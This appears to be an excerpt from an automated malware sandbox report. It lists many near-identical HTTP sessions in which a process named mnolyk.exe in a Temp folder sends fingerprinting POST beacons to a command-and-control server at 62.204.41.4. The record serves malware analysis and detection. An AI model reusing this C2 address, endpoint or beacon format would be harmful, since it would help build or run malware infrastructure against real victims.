                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.211611986 CET | 463 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      310 | 192.168.2.7 | 50037 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:23.652170897 CET | 763 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.715187073 CET | 763 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      311 | 192.168.2.7 | 50038 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:23.886375904 CET | 764 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:23.949320078 CET | 764 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      312 | 192.168.2.7 | 50039 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:24.123203039 CET | 765 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.188124895 CET | 765 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      313 | 192.168.2.7 | 50040 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:24.355269909 CET | 766 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.418427944 CET | 766 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      314 | 192.168.2.7 | 50041 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:24.611334085 CET | 767 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.675154924 CET | 767 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      315 | 192.168.2.7 | 50042 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:24.857892990 CET | 768 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:24.921021938 CET | 768 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      316 | 192.168.2.7 | 50043 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:25.122543097 CET | 769 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.187724113 CET | 769 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      317 | 192.168.2.7 | 50044 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:25.381632090 CET | 770 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.444655895 CET | 770 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      318 | 192.168.2.7 | 50045 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:25.620163918 CET | 771 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.683967113 CET | 771 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      319 | 192.168.2.7 | 50046 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:25.862441063 CET | 772 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.927823067 CET | 772 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      32 | 192.168.2.7 | 49756 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:05.379931927 CET | 464 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.444961071 CET | 464 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      320 | 192.168.2.7 | 50047 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:26.104922056 CET | 773 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.168797016 CET | 773 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      321 | 192.168.2.7 | 50048 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:26.342561007 CET | 774 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.407500029 CET | 774 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      322 | 192.168.2.7 | 50049 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:26.579535961 CET | 775 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.642302036 CET | 775 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      323 | 192.168.2.7 | 50050 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:26.808862925 CET | 776 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.872878075 CET | 776 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      324 | 192.168.2.7 | 50051 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:27.043304920 CET | 777 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.109849930 CET | 777 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      325 | 192.168.2.7 | 50052 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:27.283164024 CET | 778 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.348197937 CET | 778 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      326 | 192.168.2.7 | 50053 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:27.528345108 CET | 779 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.594378948 CET | 780 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


